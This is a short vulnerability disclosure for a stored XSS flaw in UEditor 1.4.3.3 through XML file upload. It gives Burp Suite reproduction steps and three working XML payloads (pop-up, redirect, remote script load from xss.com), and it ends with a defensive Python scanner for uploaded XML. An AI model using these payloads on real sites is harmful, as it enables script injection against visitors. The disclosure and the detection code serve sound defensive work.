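I. Stored XSS via XML file upload in the latest version of UEditor
Tested version: PHP version, v1.4.3.3
Download: https://github.com/fex-team/ueditor
Steps to reproduce:
1. Upload an image file.
2. Intercept the request with Burp Suite.
3. Change the uploadimage type to uploadfile, change the file extension to xml, and finally paste in the XML code.
4. The XSS then pops up.
Note the access path of http://controller.xxx: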
http://192.168.10.1/ueditor1433/php/controller.php?action=listfile
Common XML pop-up PoCs:
Pop-up XSS:
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> alert(1);
</something:script>
</body>
</html>
URL redirect:
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> window.location.href="https://www.t00ls.net/";
</something:script>
</body>
</html>
Remote JS loading:
<html>
<head></head>
<body>
<something:script src="http://xss.com/xss.js" xmlns:something="http://www.w3.org/1999/xhtml">
</something:script>
</body>
</html>
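
A defensive check for the upload directory, added here as an example (not code from UEditor or from the original post): the PoCs above bind an arbitrary prefix to the XHTML namespace, so a substring search for <script misses them, while a namespace-aware parse of each stored .xml file flags any element in that namespace. The function names and sample data are assumptions constructed for illustration.

```python
import pathlib
import xml.etree.ElementTree as ET

XHTML_NS = "http://www.w3.org/1999/xhtml"

# Constructed samples: the first mirrors the shape of the pop-up PoC above.
SAMPLE_FLAGGED = b"""<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml"> alert(1);
</something:script>
</body>
</html>"""
SAMPLE_BENIGN = b"<catalog><item id='1'>report.pdf</item></catalog>"


def find_active_content(xml_bytes):
    """Return findings for one uploaded XML file; an empty list means clean."""
    # Refuse DTDs outright instead of parsing entity declarations from uploads.
    if b"<!DOCTYPE" in xml_bytes or b"<!ENTITY" in xml_bytes:
        return ["DTD or entity declaration present (file not parsed)"]
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    findings = []
    for el in root.iter():
        # ElementTree resolves prefixes, so "something:script" arrives as
        # "{http://www.w3.org/1999/xhtml}script" whatever prefix was chosen.
        if el.tag.startswith("{" + XHTML_NS + "}"):
            findings.append("<%s> in namespace %s" % (el.tag.split("}", 1)[1], XHTML_NS))
    return findings


def scan_upload_dir(upload_dir):
    """Map every flagged .xml file under upload_dir to its findings."""
    report = {}
    for path in pathlib.Path(upload_dir).rglob("*"):
        if path.is_file() and path.suffix.lower() == ".xml":
            findings = find_active_content(path.read_bytes())
            if findings:
                report[str(path)] = findings
    return report


if __name__ == "__main__":
    print(b"<script" in SAMPLE_FLAGGED)          # naive substring check
    print(find_active_content(SAMPLE_FLAGGED))
    print(find_active_content(SAMPLE_BENIGN))
```

Pass scan_upload_dir the directory where the editor stores uploaded files; any file it reports should not be served to browsers with an XML content type.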